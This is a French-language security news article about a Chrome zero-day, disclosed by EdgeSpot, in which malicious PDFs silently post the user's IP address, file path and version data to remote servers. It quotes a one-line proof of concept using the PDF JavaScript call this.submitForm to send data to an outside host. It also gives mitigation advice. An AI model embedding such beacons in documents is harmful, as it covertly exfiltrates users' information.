Service de détection d'exploits EdgeSpot a découvert une vulnérabilité intriguante de type « jour zéro» dans Chrome, exploitant des documents PDF. Cette vulnérabilité permet aux attaquants de collecter des données sensibles à l'aide de documents PDF malveillants ouverts dans Chrome.

Dès que la victime ouvre les fichiers PDF correspondants dans Google Chrome, un programme malveillant commence à fonctionner en arrière-plan en collectant des données utilisateur.

Les données sont ensuite transmises au serveur distant contrôlé par les pirates. Vous vous demandez peut-être quelles données sont aspirées par les attaquants, ils ciblent les données suivantes sur votre PC:

• adresse IP
• Chemin complet du fichier PDF sur le système
• Versions OS et Chrome

Méfiez-vous des fichiers PDF protégés par des programmes malveillants

Vous serez peut-être surpris de savoir que rien ne se produit lorsque Adobe Reader est utilisé pour ouvrir des fichiers PDF. De plus, les requêtes HTTP POST sont utilisées pour transférer des données sur les serveurs distants sans aucune intervention de l'utilisateur.

Les experts ont remarqué que l’un des deux domaines, readnotifycom ou burpcollaboratornet, recevait les données.

Vous pouvez imaginer l'intensité de l'attaque en considérant le fait que la plupart des logiciels antivirus ne sont pas en mesure de détecter les échantillons détectés par EdgeSpot.

Les experts ont révélé que les attaquants utilisaient l'API PDF Javascript «this.submitForm ()» pour collecter les informations sensibles des utilisateurs.

Nous l'avons testé avec une PoC minimale, un simple appel d'API du type «this.submitForm ('http://google.com/test')» obligera Google Chrome à envoyer les données personnelles à google.com.

Les experts ont en effet découvert que ce bug de Chrome était exploité par deux ensembles distincts de fichiers PDF malveillants. Les deux ont été distribués en octobre 2017 et septembre 2018, respectivement.

Les données collectées peuvent notamment être utilisées par les attaquants pour affiner les attaques à l'avenir. Des rapports suggèrent que le premier lot de fichiers a été compilé à l'aide du service de suivi PDF de ReadNotify.

Les utilisateurs peuvent utiliser le service pour garder trace de leurs vues. EdgeSpot n'a pas communiqué de détails concernant la nature du deuxième ensemble de fichiers PDF.

Comment rester protégé

Le service de détection d’exploitation EdgeSpot voulait alerter les utilisateurs de Chrome des utilisateurs des risques potentiels, car le correctif ne devrait pas être publié dans un avenir proche.

L'année dernière, EdgeSpot a signalé à Google cette vulnérabilité et a promis de publier un correctif fin avril. H

Cependant, vous pouvez envisager une solution temporaire au problème en affichant localement les documents PDF reçus à l'aide d'une autre application de lecture de PDF.

Vous pouvez également ouvrir vos documents PDF dans Chrome en déconnectant vos systèmes d'Internet. En attendant, vous pouvez attendre la mise à jour de Chrome 74 qui devrait être lancée le 23 avril.